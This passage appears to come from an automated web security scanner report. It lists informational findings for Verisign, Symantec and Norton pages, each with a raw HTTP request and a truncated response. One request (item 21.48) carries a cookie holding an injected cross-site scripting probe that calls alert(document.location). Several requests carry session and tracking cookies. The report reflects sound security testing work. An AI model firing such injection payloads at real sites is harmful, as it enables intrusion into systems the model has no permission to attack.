HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:16 GMT Content-Type: text/html;charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 8588 <html> <head> <title>Referring Partner Code Error</title> <link href="/geocenter/style.css" type=text/css rel="stylesheet"> <style type=...[SNIP]...
21.46. https://query.verisign.com/search
Summary
Severity: Information
Confidence: Certain
Host: https://query.verisign.com
Path: /search
Request
GET /search HTTP/1.1 Host: query.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 44676 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]...
21.47. https://renewals.symantec.com/renewals/application
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/application
Request
GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:50 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store Content-Length: 21436 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]...
21.48. https://renewals.symantec.com/renewals/chat_form.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/chat_form.jsp
Request
GET /renewals/chat_form.jsp HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit) User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:39:05 GMT Content-Type: text/html Content-Length: 15726 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- BEGIN IMPORT_INCLUDE--> <!--END IMPORT_INCLUDE--> <html> <head><ti...[SNIP]...
21.49. https://renewals.symantec.com/renewals/chat_norton.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/chat_norton.jsp
Request
GET /renewals/chat_norton.jsp HTTP/1.1 Host: renewals.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:25 GMT Content-Length: 1638 Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN"> <head>...[SNIP]...
21.50. https://renewals.symantec.com/renewals/renewal_search.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/renewal_search.jsp
Request
GET /renewals/renewal_search.jsp HTTP/1.1 Host: renewals.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 21436 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]...
21.51. https://renewals.symantec.com/renewals/symantec_where_sn.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/symantec_where_sn.jsp
Request
GET /renewals/symantec_where_sn.jsp HTTP/1.1 Host: renewals.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:25 GMT Content-Length: 10220 Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten...[SNIP]...
21.52. https://seal.verisign.com/getseal
Summary
Severity: Information
Confidence: Certain
Host: https://seal.verisign.com
Path: /getseal
Request
GET /getseal HTTP/1.1 Host: seal.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0, must-revalidate ETag: Content-Type: text/javascript Date: Fri, 09 Sep 2011 21:46:24 GMT Connection: close <!-- x=1; -->
21.53. https://securitycenter.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://securitycenter.verisign.com
Path: /
Request
GET / HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE1WkhKCKMQP1p2JJzrZf2h3PXz1qghWLRzUhS1WUJUiNzxbzTT!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:41 GMT Content-length: 129 Content-type: text/html Last-modified: Thu, 23 Dec 2004 19:39:49 GMT Etag: "81-41cb1f05" Accept-ranges: bytes <html> <head> <meta http-equiv="Refresh" content="0; url=https://www.verisign.com/products/site/"> </head> <body></body> </html>
21.54. https://securitycenter.verisign.com/celp/enroll/outsideSearch
Summary
Severity: Information
Confidence: Certain
Host: https://securitycenter.verisign.com
Path: /celp/enroll/outsideSearch
Request
GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-type: text/html; charset=utf-8 Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/ Connection: close <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"/> <title> Search for SSL or Code Signing Certificates from VeriSig...[SNIP]...
21.55. https://test-products.verisign.com/geocenter/reseller/logon.do
Summary
Severity: Information
Confidence: Certain
Host: https://test-products.verisign.com
Path: /geocenter/reseller/logon.do
Request
GET /geocenter/reseller/logon.do HTTP/1.1 Host: test-products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:46 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 17100 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]...
21.56. https://us.norton.com/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://us.norton.com
Path: /index.jsp
Request
GET /index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=2601 Date: Fri, 09 Sep 2011 21:47:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 90635 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Norton - Antivirus Software, Spyware Protection and Personal Firewall by Sym...[SNIP]...
21.57. https://vipmobile.verisign.com/home.v
Summary
Severity: Information
Confidence: Certain
Host: https://vipmobile.verisign.com
Path: /home.v
Request
GET /home.v HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://idprotect.verisign.com/orderstart.v Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:52:06 GMT Server: Apache Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 16260 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]...
21.58. https://vipmobile.verisign.com/supportedphones.v
Summary
Severity: Information
Confidence: Certain
Host: https://vipmobile.verisign.com
Path: /supportedphones.v
Request
GET /supportedphones.v HTTP/1.1 Host: vipmobile.verisign.com Connection: keep-alive Referer: https://vipmobile.verisign.com/home.v User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 22:03:46 GMT Server: Apache Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 1508897 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]...
21.59. https://www-secure.symantec.com/
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /
Request
GET / HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1117 Date: Fri, 09 Sep 2011 21:47:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42824 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Symantec - AntiVirus, Anti-Spyware, Endpoint Security, Backup, Storage Solut...[SNIP]...
21.60. https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /about/profile/policies/eulas/index.jsp
Request
GET /about/profile/policies/eulas/index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1717 Date: Fri, 09 Sep 2011 21:47:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 98373 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Product License Agreements - Symantec Corp.</title> <meta http-equiv="Conten...[SNIP]...
21.61. https://www-secure.symantec.com/about/profile/policies/legal.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /about/profile/policies/legal.jsp
Request
GET /about/profile/policies/legal.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1694 Date: Fri, 09 Sep 2011 21:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 59713 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Legal Notices</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Conten...[SNIP]...
21.62. https://www-secure.symantec.com/about/profile/policies/privacy.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /about/profile/policies/privacy.jsp
Request
GET /about/profile/policies/privacy.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1721 Date: Fri, 09 Sep 2011 21:47:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82442 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Complete Privacy Policy - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"...[SNIP]...
21.63. https://www-secure.symantec.com/business/theme.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /business/theme.jsp
Request
GET /business/theme.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1688 Date: Fri, 09 Sep 2011 21:47:38 GMT Content-Length: 0 Connection: close
21.64. https://www-secure.symantec.com/feedback/contactus.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /feedback/contactus.jsp
Request
GET /feedback/contactus.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1684 Date: Fri, 09 Sep 2011 21:47:32 GMT Content-Length: 29862 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Contact Us - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http...[SNIP]...
21.65. https://www-secure.symantec.com/feedback/webmaster.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /feedback/webmaster.jsp
Request
GET /feedback/webmaster.jsp?theURL= HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1677 Date: Fri, 09 Sep 2011 21:47:32 GMT Content-Length: 24273 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Report a Broken Link - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...[SNIP]...
21.66. https://www-secure.symantec.com/globalsites/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /globalsites/index.jsp
Request
GET /globalsites/index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1722 Date: Fri, 09 Sep 2011 21:47:39 GMT Content-Length: 23505 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Global Sites - Symantec Corp.</title> <meta http-equiv="Content-Type" conten...[SNIP]...
21.67. https://www-secure.symantec.com/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /index.jsp
Request
GET /index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1720 Date: Fri, 09 Sep 2011 21:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42824 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Symantec - AntiVirus, Anti-Spyware, Endpoint Security, Backup, Storage Solut...[SNIP]...
21.68. https://www-secure.symantec.com/rss/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /rss/index.jsp
Request
GET /rss/index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1694 Date: Fri, 09 Sep 2011 21:47:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38409 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>RSS - Symantec Corp.</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv=...[SNIP]...
21.69. https://www-secure.symantec.com/sitemap/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /sitemap/index.jsp
Request
GET /sitemap/index.jsp HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1616 Date: Fri, 09 Sep 2011 21:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33953 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Site Map: Information Security - Computer Security Solutions and Services | Symantec Corp</title> <meta http-equiv=...[SNIP]...
21.70. https://www.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /
Request
GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]...
21.71. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /authweb/global/assets/shared/js/rotator.custom.js
Request
GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:48 GMT Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:27:48 GMT Content-Length: 985 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html $(document).ready (function(){ bannerFadeIn = 0; bannerFadeOut = 0; $("#prevnext a.prev").click(function(e){ var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) + ...[SNIP]...
21.72. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /authweb/global/assets/shared/js/rotator.js
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://www.verisign.com/products-services/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
